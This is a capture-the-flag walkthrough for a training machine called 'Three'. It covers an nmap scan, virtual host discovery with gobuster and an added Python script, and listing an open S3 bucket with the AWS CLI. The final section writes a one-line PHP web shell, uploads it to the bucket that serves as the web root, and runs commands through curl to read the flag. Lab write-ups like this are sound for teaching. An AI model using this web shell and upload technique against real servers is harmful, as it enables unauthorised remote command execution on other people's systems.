Three

Task #1: How many TCP ports are open?

  • A: 2

  • nmap -sC -sV -p- -T5 -vv 10.129.202.49 (note the warning in the output: -T5 hit the retransmission cap, so the 5291 "filtered" ports are unanswered probes rather than a firewall; a slower pass such as -T4 is the usual check before trusting a full -p- sweep, though here the two open ports are enough to answer the task)

    $ nmap -sC -sV -p- -T5 -vv 10.129.202.49
    Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-13 15:18 EST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    Initiating Ping Scan at 15:18
    Scanning 10.129.202.49 [2 ports]
    Completed Ping Scan at 15:18, 0.27s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 15:18
    Completed Parallel DNS resolution of 1 host. at 15:18, 0.01s elapsed
    Initiating Connect Scan at 15:18
    Scanning 10.129.202.49 [65535 ports]
    Discovered open port 22/tcp on 10.129.202.49
    Discovered open port 80/tcp on 10.129.202.49
    Warning: 10.129.202.49 giving up on port because retransmission cap hit (2).
    Completed Connect Scan at 15:18, 11.89s elapsed (65535 total ports)
    Initiating Service scan at 15:18
    Scanning 2 services on 10.129.202.49
    Completed Service scan at 15:18, 6.28s elapsed (2 services on 1 host)
    NSE: Script scanning 10.129.202.49.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 3.39s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.48s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    Nmap scan report for 10.129.202.49
    Host is up, received conn-refused (0.016s latency).
    Scanned at 2022-12-13 15:18:09 EST for 22s
    Not shown: 60242 closed ports, 5291 filtered ports
    Reason: 60242 conn-refused and 5291 no-responses
    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCitBp4qe2+WEqMGa7+L3eEgbrqD/tH3G5PYsQ9nMFx6Erg9Rp+jn7D9QqC9GqKdraCCUQTzVoW3zqEd83Ef4iWR7VXjTb469txJU+Y8XlG/4JzegbjO6WYyfQTtQ3nLkqpa21BZEdH9ap28mcJAggj4/uHTiA3yTgZ2C+zPA6LoIS7CaB1DPK2q/8wrxDiRNv4gGiSjcxEilpL8Qls4R3Ny3QJD89hvgEdV9zapTS5T9hOfUdwbkElabjrWL4zs/E+cyHSZF5pPREiv6QkdMmk7cvMND5epXA29womDuabJsDLhrFYFecJxDmXhv6yspRAemCewOX+GnWckerKYeOf
    |   256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEkEPksFeIH9z6Ds6r7s2Uff45kDk/PEnvXYwP0ny6pKsP2s62W3PZVCywfF3aC8ONsAqQh6zy0s44Zv8B8g+rI=
    |   256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwGMkF/JG8KPrh19vLPmhe+RC0WBQt06gh1zE3EOo2q
    80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: The Toppers
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.69 seconds
    

Task #2: What is the domain of the email address provided in the "Contact" section of the website?

  • A: thetoppers.htb

Task #3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

  • A: /etc/hosts

Task #4: Which sub-domain is discovered during further enumeration?

  • A: s3.thetoppers.htb
  • Add 10.129.202.49 thetoppers.htb to /etc/hosts
  • gobuster vhost -u thetoppers.htb -w subdomains.txt (gobuster 3.2 and later need --append-domain as well, otherwise each wordlist entry is sent as a bare Host header and nothing matches)
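What gobuster vhost is doing in the step above, as an added example (not code from the walkthrough): every candidate is sent to the same IP with a different Host header and compared against a baseline response for a name that cannot exist, so a server that answers every Host with the default site produces no false hits. The target IP and base domain are taken from the write-up; the response sizes and the fake transport are constructed so the module runs offline. The transport is a parameter, so the same function runs against the live box with `http_transport(TARGET_IP)`.

```python
import http.client
import secrets
from typing import Callable, Dict, Iterable, List, Tuple

TARGET_IP = "10.129.202.49"       # from the write-up
BASE_DOMAIN = "thetoppers.htb"    # from the write-up

# A transport takes a Host header value and returns (status, body length).
Transport = Callable[[str], Tuple[int, int]]


def http_transport(ip: str, port: int = 80, timeout: float = 5.0) -> Transport:
    """Real transport: plain HTTP GET / to the IP, Host header supplied per call."""
    def fetch(host: str) -> Tuple[int, int]:
        conn = http.client.HTTPConnection(ip, port, timeout=timeout)
        try:
            conn.request("GET", "/", headers={"Host": host})
            resp = conn.getresponse()
            body = resp.read()
            return resp.status, len(body)
        finally:
            conn.close()
    return fetch


def find_vhosts(words: Iterable[str], base_domain: str, fetch: Transport,
                size_tolerance: int = 0) -> List[Tuple[str, int, int]]:
    """Return (hostname, status, size) for every candidate whose response differs
    from the baseline. The baseline Host is a random label under the base domain,
    which should not exist, so it captures what the default vhost looks like."""
    baseline_host = f"{secrets.token_hex(8)}.{base_domain}"
    base_status, base_size = fetch(baseline_host)
    hits = []
    for word in words:
        host = f"{word}.{base_domain}"
        status, size = fetch(host)
        if status != base_status or abs(size - base_size) > size_tolerance:
            hits.append((host, status, size))
    return hits


# --- constructed offline stand-in for the target (assumption, not captured) ---
# The default vhost serves the band site; s3.thetoppers.htb answers with a much
# smaller body. Sizes are made up for the demo.
FAKE_RESPONSES: Dict[str, Tuple[int, int]] = {
    "s3.thetoppers.htb": (200, 389),
}
DEFAULT_RESPONSE = (200, 11952)   # any unknown Host gets the default site


def fake_transport(host: str) -> Tuple[int, int]:
    return FAKE_RESPONSES.get(host, DEFAULT_RESPONSE)


CANDIDATES = ["www", "mail", "dev", "s3", "admin", "api"]

if __name__ == "__main__":
    # Offline demo; for the live box use http_transport(TARGET_IP) instead.
    for host, status, size in find_vhosts(CANDIDATES, BASE_DOMAIN, fake_transport):
        print(f"Found: {host} (Status: {status}) [Size: {size}]")
```

The size comparison is why a baseline matters: many servers return 200 for every Host, so status alone finds nothing, while body length separates the default site from a real virtual host. `size_tolerance` absorbs pages that embed a timestamp or nonce.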

Task #5: Which service is running on the discovered sub-domain?

  • A: Amazon S3
  • Add 10.129.202.49 s3.thetoppers.htb to /etc/hosts (a second entry, or append the name to the existing line for that IP)

Task #6: Which command line utility can be used to interact with the service running on the discovered sub-domain?

  • A: awscli

Task #7: Which command is used to set up the AWS CLI installation?

  • A: aws configure
  • sudo apt install awscli, then aws configure; it prompts for access key, secret key, default region and output format

Task #8: What is the command used by the above utility to list all of the S3 buckets?

  • A: aws s3 ls
  • Enter placeholder values for the access key and secret key: the CLI refuses to send a request without credentials configured, and the lab endpoint does not validate them
  • Point the CLI at the box with --endpoint-url http://s3.thetoppers.htb (the write-up abbreviates this to --endpoint), otherwise aws s3 ls talks to real AWS with the bogus keys

Task #9: This server is configured to run files written in what web scripting language?

  • A: PHP

Root flag: a980d99281a28d638ac68b9bf9453c2b

  • aws --endpoint-url http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb shows us an .htaccess file and an index.php file. Those are the files of the site on port 80, so the bucket is the web root of thetoppers.htb: anything written to it is served by Apache and, being PHP (Task #9), executed.

  • Create a PHP payload to run commands with echo '<?php system($_GET["cmd"]); ?>' > shell.php

    Then upload it to the bucket with aws --endpoint-url http://s3.thetoppers.htb/ s3 cp shell.php s3://thetoppers.htb

  • Test through the web vhost, not the S3 endpoint: curl 'http://thetoppers.htb/shell.php?cmd=ls'. It works, so try ls ../ to see the next directory up. That shows a flag.txt file, which we can read with curl -G --data-urlencode 'cmd=cat ../flag.txt' http://thetoppers.htb/shell.php (the -G/--data-urlencode pair URL-encodes the space in the command).


Tags

  1. very easy (Private)
  2. AWS (Private)
  3. s3 (Private)